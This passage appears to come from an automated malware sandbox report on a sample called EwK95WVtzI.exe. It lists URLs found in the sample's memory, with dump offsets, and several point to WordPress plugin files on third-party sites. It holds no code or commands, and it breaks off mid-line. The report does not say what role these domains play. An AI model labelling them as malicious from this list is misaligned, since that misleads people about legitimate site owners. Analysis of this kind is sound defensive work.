                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000162E000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.nelipak.nl/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.nelipak.nl/7
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.nelipak.nl/M
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.nelipak.nl/v
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000162E000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.netcr.com/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000162E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.netcr.com/.0a
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.netcr.com//
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.netcr.com/3
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000162E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.netcr.com/H_
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001613000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.nqks.com/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.nqks.com/.0p
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.nqks.com/m/T
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001613000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.nqks.com/s
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.nqks.com/v1.0
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.nunomira.com/
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.0000000001625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.nunomira.com/3
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.0000000001625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.nunomira.com/e
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001613000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.olras.com/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001613000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.olras.com/x
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ora-ito.com/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ora-ito.com/9b
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ora-ito.com/Z
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ora-ito.com/iI
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ora-ito.com/y
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.0000000001625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ora.ecnet.jp/
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.0000000001625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ora.ecnet.jp/bT
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1844171845.0000000001625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.otena.com/
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.0000000001625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.otena.com/B
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ottospm.com/
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.0000000001625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ottospm.com/Y
                Source: EwK95WVtzI.exe, 00000000.00000003.1843966184.0000000007788000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ottospm.com/xmlrpc.php
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.owsports.ca/
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.0000000001625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.owsports.ca/a
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.0000000001625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.owsports.ca/n
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pb-games.com/B
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-gdpr.css?ver=2.
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-public.css?ver=
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-table.css?ver=2
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/cookie-law-info/public/js/cookie-law-info-public.js?ver=2.
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/download-now-for-woocommerce/assets/css/somdn-style.css?ve
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/download-now-for-woocommerce/assets/js/somdn_script.js?ver
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/dt-the7-core/assets/css/post-type.min.css?ver=2.5.7.1
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.3.1
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 